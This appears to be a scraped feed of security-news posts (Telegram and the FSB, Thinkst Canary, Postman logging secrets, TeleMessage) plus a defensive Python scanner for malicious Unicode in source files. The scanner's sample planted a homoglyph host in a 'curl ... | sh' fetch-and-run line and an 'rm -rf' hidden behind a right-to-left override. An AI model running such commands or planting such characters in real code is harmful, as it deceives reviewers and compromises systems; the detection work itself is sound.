"You learn something new every day, if you're not careful." — Wilf Lunn
Location: Duluth, MN

Exciting news for open source + vuln nerds alike: runZero now speaks Nuclei!

We 🩵 open source and are beyond excited to announce that we have added initial support for ProjectDiscovery’s open source Nuclei scanner — kicking off with safe, targeted checks for default and weak web credentials across IT, OT, IoT, and cloud environments.

Check out today's post from @todb to see how we:

✅ Curated ~180 safe, non-disruptive templates
✅ Only run checks when services are positively fingerprinted
✅ Keep scans fast, polite, and precise — even in fragile ICS environments

This is just the beginning. More protocols, smarter checks, and community collaboration ahead!

👉 Check it out: https://www.runzero.com/blog/integrating-nuclei/

Remarkable investigation into Telegram by IStories (in Russian):
https://www.istories.media/stories/2025/06/10/kak-telegram-svyazan-s-fsb/

English version by OCCRP:
http://www.occrp.org/en/investigation/telegram-the-fsb-and-the-man-in-the-middle

tl;dr:

👉 Telegram uses a single company with ties to the Russian FSB as their sole infrastructure provider, globally.

👉 Combined with a cleartext device identifier Telegram's protocol requires to be prepended to all encrypted messages, this allows for global surveillance of Telegram users.

I am quoted in this story.

#Telegram #InfoSec #Privacy

How Telegram is connected to the FSB

The messenger's infrastructure is run by the same people who service the secret systems that Russian special services use to surveil citizens

Shortly after waking up I got a possible fraud attempt notification from AmEx. 15 minutes later, I'd canceled the card. Sorry not sorry, thief.

10 MB hard disk from the 1960s

For TechCrunch, I wrote about Thinkst Canary, a bootstrapped maker of honeypots (for catching hackers), which this month marks its 10th anniversary. The company now brings in $20 million in ARR without VC funding or an outbound sales team.

Refreshing at a time when cyber is dominated by VC dollars.

https://techcrunch.com/2025/05/29/a-decade-in-bootstrapped-thinkst-canary-reaches-20m-in-arr-without-vc-funding/

A decade in, bootstrapped Thinkst Canary reaches $20M in ARR without VC funding | TechCrunch

Reflecting on 10 years since its launch, the honeypot maker explains why the company did not take on any VC funding.

TechCrunch

A PSA for why you should probably not use Postman (it can leak secrets to them): https://anonymousdata.medium.com/postman-is-logging-all-your-secrets-and-environment-variables-9c316e92d424
Postman is logging all your secrets and environment variables

I was originally investigating this report that Postman is not HIPAA compliant. I found that Postman is not just wholly unsuitable for anyone testing a healthcare application — it has virtually zero…

Medium

Here's how the TM SGNL server, which had access to plaintext chat logs from people like Mike Waltz, got hacked in about 20 minutes https://www.wired.com/story/how-the-signal-knock-off-app-telemessage-got-hacked-in-20-minutes/ (my first article in WIRED!)
How the Signal Knockoff App TeleMessage Got Hacked in 20 Minutes

The company behind the Signal clone used by at least one Trump administration official was breached earlier this month. The hacker says they got in thanks to a basic misconfiguration.

WIRED

Malware attack and counterattack

This is the story of a phishing, of a hacking, of what I learned, and how I counterattacked. The phishing: it all started with an email from a journalist who wanted to interview me about my artistic work. The email was from a certain Eirik Halvorsen, writing on behalf of an online art magazine, Artscope. This happens to me regularly, but this time the email was so cleanly and formally written that I told my friends that it looked like it had been written by an AI. But it was […]

https://www.antoineschmitt.com/malware-attack-and-counterattack/

Detecting malicious Unicode

In a recent educational trick, curl contributor James Fuller submitted a pull-request to the project in which he suggested a larger cleanup of a set of scripts. In a later presentation, he could show us how not a single human reviewer in the team nor any CI job had spotted or remarked on one of …

daniel.haxx.se
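The trick the curl post refers to works because a Unicode character can look exactly like ASCII to a human reviewer while meaning something else to the machine. The scanner below is an added example, not curl's own check and not code from the post: it flags every non-ASCII code point in a source file and says why it matters, distinguishing bidi/format controls, letters from non-Latin scripts, and compatibility lookalikes that NFKC folds to ASCII. The shell snippet in SAMPLE is constructed for the demonstration, with three planted characters.

```python
"""Flag non-ASCII code points in source text and explain why each is a risk.

Added example, not curl's own check and not code from the post it accompanies.
It assumes the policy the post implies for a source tree: anything outside
ASCII deserves a human look, and some classes are almost always hostile.
"""
import sys
import unicodedata

# Format/control code points that are invisible or change rendering order
# (Trojan Source style bidi overrides, zero-width joiners, BOM, soft hyphen).
INVISIBLE_OR_BIDI = {
    0x200B, 0x200C, 0x200D, 0x2060, 0xFEFF,
    0x202A, 0x202B, 0x202C, 0x202D, 0x202E,
    0x2066, 0x2067, 0x2068, 0x2069,
    0x00AD, 0x034F,
}


def classify(ch):
    """Return a short reason a character is suspicious, or None for plain ASCII."""
    cp = ord(ch)
    if cp < 0x80:
        return None
    if cp in INVISIBLE_OR_BIDI or unicodedata.category(ch) == "Cf":
        return "invisible/bidi control"
    # Fullwidth, mathematical and similar lookalikes fold to ASCII under NFKC.
    folded = unicodedata.normalize("NFKC", ch)
    if folded != ch and folded.isascii():
        return "compatibility lookalike of %r" % folded
    # A letter from another script (Cyrillic, Greek, ...) that renders like Latin.
    name = unicodedata.name(ch, "")
    if unicodedata.category(ch).startswith("L") and not name.startswith("LATIN"):
        return "non-Latin letter"
    return "non-ASCII"


def scan_text(text, filename="<input>"):
    """Return (file, line, col, codepoint, name, reason) for each flagged char."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for col, ch in enumerate(line, 1):
            reason = classify(ch)
            if reason:
                findings.append((filename, lineno, col, "U+%04X" % ord(ch),
                                 unicodedata.name(ch, "?"), reason))
    return findings


def scan_files(paths):
    """Scan files on disk; undecodable bytes surface as U+FFFD and are flagged too."""
    findings = []
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            findings.extend(scan_text(fh.read(), path))
    return findings


# Constructed sample: a shell snippet with three planted characters.
SAMPLE = (
    "#!/bin/sh\n"
    "curl https://ex\u0430mple.com/install.sh | sh\n"   # U+0430 Cyrillic a in the host
    "echo 'all ascii here'\n"
    "# safe \u202e}; rm -rf /tmp/x; {\n"                # U+202E RLO hides text in a comment
    "url=https://\uff45xample.org\n"                     # U+FF45 fullwidth e
)

if __name__ == "__main__":
    hits = scan_files(sys.argv[1:]) if len(sys.argv) > 1 else scan_text(SAMPLE, "sample.sh")
    for f, ln, col, cp, name, reason in hits:
        print("%s:%d:%d: %s %s (%s)" % (f, ln, col, cp, name, reason))
    sys.exit(1 if hits else 0)
```

Run it with file paths as arguments to use it as a CI gate (non-zero exit on any hit); with no arguments it scans the constructed sample and reports the Cyrillic "а", the right-to-left override and the fullwidth "e". Any legitimately non-ASCII file (documentation, translations) needs an explicit allowlist rather than a weaker rule, since the whole point is that a reviewer cannot tell the difference by eye.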

⚡ New Research Report⚡ Divining risk isn’t just for mystics. Defenders do it every day — reading signals, spotting patterns, and deciding what really matters. In our latest report, @todb breaks down the three scoring systems at the core of modern triage: CVSS, EPSS, and SSVC.

What’s inside:

👉 A breakdown of CVSS, EPSS, and SSVC — how they work, where they mislead, and what signals are actually useful

👉 Data-backed insights from analyzing 270,000+ CVEs, including the biggest EPSS score movers and what they reveal

👉 Practical guidance on combining scores with PoCs, asset context, and data to triage smarter

This isn’t a teardown. It’s a practical guide for interpreting risk through a sharper, more intuitive lens.

Read it here and tell us what you think: https://www.runzero.com/resources/deciphering-signals-from-vulnerability-scores/

Divining Risk: Deciphering Signals From Vulnerability Scores

Vuln scores aim to clarify but often create noise. We analyzed 270k+ CVEs to see what CVSS, EPSS & SSVC reveal – and what they don't.

runZero